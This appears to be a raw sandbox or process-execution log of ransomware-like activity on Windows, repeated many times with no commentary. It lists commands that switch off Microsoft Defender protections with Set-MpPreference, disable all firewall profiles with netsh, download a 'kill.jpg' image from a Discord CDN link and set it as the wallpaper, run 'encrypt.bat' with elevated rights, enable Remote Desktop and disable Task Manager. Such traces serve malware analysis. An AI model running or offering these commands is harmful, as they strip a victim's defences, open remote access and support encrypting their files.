powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

